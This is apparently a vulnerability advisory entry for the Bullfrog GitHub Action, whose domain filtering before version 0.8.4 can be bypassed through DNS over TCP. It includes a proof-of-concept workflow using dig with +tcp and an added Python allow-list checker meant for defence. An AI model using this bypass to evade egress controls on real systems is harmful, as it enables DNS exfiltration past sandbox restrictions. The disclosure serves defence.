An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS1tMzJmLWZqdzItMzd2M84ABH5K

Moderate severity. EPSS: 0.00048% (0.14712 Percentile)

Bullfrog's DNS over TCP bypasses domain filtering

Affected Packages: actions:bullfrogsec/bullfrog
Affected Versions: < 0.8.4
Fixed Versions: 0.8.4

Summary

Using DNS over TCP bypasses Bullfrog's domain blocking and allows DNS exfiltration.

PoC

name: test
on:
  push:
    branches:
      - "*"

jobs:
  testBullFrog:
    runs-on: ubuntu-22.04
    steps:
      - name: Use Cloudflare DNS (1.1.1.1)
        run: |
          sudo resolvectl dns eth0 1.1.1.1
          resolvectl status
      - name: Set up bullfrog to block everything
        uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
        with:
           egress-policy: block
           allowed-domains: |
             *.github.com
      - name: Test connectivity
        run: |
          echo testing udp allowed ..
          dig api.github.com @1.1.1.1 || :
          echo testing tcp allowed ..
          dig api.github.com @1.1.1.1 +tcp || :

          echo testing udp not allowed
          dig api.google.com @1.1.1.1 || :
          echo testing tcp not allowed
          dig api.google.com @1.1.1.1 +tcp || :

Impact

sandbox bypass
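
An added example, not taken from the advisory or from Bullfrog's code base: a transport-independent allow-list check that unwraps DNS over TCP framing (a 2-byte length prefix per message) so that TCP queries get the same verdict as UDP ones and unparseable input is refused. The helper names, the wildcard semantics and the sample queries are assumptions constructed for illustration.

```python
import struct

ALLOWED = ["*.github.com"]  # allow-list taken from the PoC workflow

def build_query(name, qid=0x1234):
    """Build a minimal DNS A/IN query; used only to construct sample input."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    labels = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split("."))
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)

def tcp_frame(msg):
    """DNS over TCP prefixes each message with a 2-byte length (RFC 1035 4.2.2)."""
    return struct.pack("!H", len(msg)) + msg

def split_tcp(stream):
    """Split a reassembled TCP payload into the DNS messages it carries."""
    msgs, i = [], 0
    while i < len(stream):
        if i + 2 > len(stream):
            raise ValueError("truncated length prefix")
        (n,) = struct.unpack_from("!H", stream, i)
        if n == 0 or i + 2 + n > len(stream):
            raise ValueError("truncated DNS message")
        msgs.append(stream[i + 2:i + 2 + n])
        i += 2 + n
    return msgs

def question_name(msg):
    """Return the lower-cased QNAME of the first question in a DNS message."""
    labels, i = [], 12  # the fixed DNS header is 12 bytes
    while True:
        n = msg[i]  # IndexError on truncated input is handled in verdict()
        if n == 0:
            return ".".join(labels)
        if n > 63:
            raise ValueError("compressed or invalid label in question")
        labels.append(msg[i + 1:i + 1 + n].decode("ascii").lower())
        i += 1 + n

def is_allowed(name, patterns=ALLOWED):
    """Assumed semantics: '*.example.com' matches subdomains only."""
    return any(name.endswith(p[1:]) if p.startswith("*.") else name == p
               for p in patterns)

def verdict(payload, transport):
    """True only if every query in the payload names an allowed domain."""
    try:
        msgs = split_tcp(payload) if transport == "tcp" else [payload]
        return bool(msgs) and all(is_allowed(question_name(m)) for m in msgs)
    except (ValueError, IndexError):
        return False  # fail closed on anything that cannot be parsed
```

A single TCP connection can carry several queries, so the verdict covers every framed message rather than only the first.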
